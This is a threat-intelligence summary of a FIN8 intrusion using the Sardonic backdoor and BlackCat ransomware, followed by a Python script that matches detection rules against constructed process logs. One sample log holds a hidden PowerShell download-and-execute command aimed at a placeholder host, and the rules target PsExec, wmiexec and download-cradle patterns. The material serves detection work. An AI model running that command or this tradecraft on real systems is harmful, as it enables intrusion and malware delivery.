FIN8 Bolsters its Arsenal with BlackCat and Updated Backdoor
Category: Threat Actor Activity | Industries: Chemical, Entertainment, Financial, Healthcare, Hospitality, Insurance, Retail, Technology | Source: Symantec
In a recent cyber incident tied to the FIN8 (aka Syssphinx) threat group, researchers from Symantec's Threat Hunter Team unveiled a sophisticated toolkit, showcasing an upgraded Sardonic backdoor and incorporating the BlackCat/AlphV (aka Noberus) ransomware encryptor. Previously, FIN8 had used the Ragnar Locker ransomware in its campaigns. Symantec highlights FIN8's ability to evolve and expand its capabilities: the group "initially specialized in point-of-sale (POS) attacks" before transitioning to ransomware attacks in recent years. This strategic shift reflects its pursuit of more lucrative opportunities. FIN8 has a history of targeting verticals associated with chemicals, entertainment, financial services, healthcare, hospitality, insurance, retail, and technology.
FIN8's latest capabilities came to light following an intrusion attributed to the group dating back to December 2022, which resulted in an attempted deployment of the BlackCat ransomware encryptor. Symantec first observed that "the attackers connected with PsExec to execute the command 'quser' to display the session details", and the attackers then used the PowerShell Invoke-Expression cmdlet to download and run their backdoor. The threat actors connected to the backdoor the following day and appear to have used the Impacket script wmiexec.py. "One of the interesting features of the backdoor is related to interactive sessions, where the attacker runs cmd.exe or other interactive processes on the affected computer. Interestingly, the sample allows up to 10 such sessions to run simultaneously. In addition, when starting each individual process, the attacker may use a process token stolen from a specified process ID that is different for each session." The operators prefer native tools and living-off-the-land binaries, including PowerShell and WMI, to stay stealthy. FIN8 intrusions have also typically been initiated through social engineering and phishing messages.
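The intrusion chain above (PsExec running quser, PowerShell Invoke-Expression fetching a payload, and wmiexec.py for remote execution) leaves process-creation artifacts that a detection pipeline can match. The following is an added example, not code from Symantec's report: it runs three simple rules over constructed process-creation records. The PSEXESVC.exe parent, the WmiPrvSE.exe parent and the ADMIN$ output-redirection pattern are assumptions drawn from how PsExec and Impacket's wmiexec.py are known to behave, not details stated on this page.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records (not from the report): parent image,
# child image and command line, as an EDR or Sysmon Event ID 1 would log them.
SAMPLE_EVENTS = [
    {"parent": "PSEXESVC.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c quser"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a')\""},
    {"parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.12 2>&1"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell Get-Process"},
]

# Rule tuples: (name, parent-image regex, command-line regex).
# - PSEXESVC.exe is the service PsExec installs on the target (assumption).
# - wmiexec.py launches commands under WmiPrvSE.exe and redirects their output
#   to an ADMIN$ share file named with a timestamp (assumption from the tool's
#   documented behaviour, not from the report).
RULES: List[Tuple[str, str, str]] = [
    ("psexec_quser", r"^psexesvc\.exe$", r"\bquser\b"),
    ("powershell_iex_download", r".*",
     r"\b(iex|invoke-expression)\b.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)"),
    ("wmiexec_output_redirect", r"^wmiprvse\.exe$", r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+"),
]


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (case-insensitive)."""
    hits = []
    for name, parent_re, cmd_re in RULES:
        if re.search(parent_re, event["parent"], re.I) and re.search(cmd_re, event["cmdline"], re.I):
            hits.append(name)
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, matched rule names) for each event that fired at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

In a real deployment the PsExec and wmiexec rules would be correlated with the originating network logon, since the same living-off-the-land tools are common in legitimate administration.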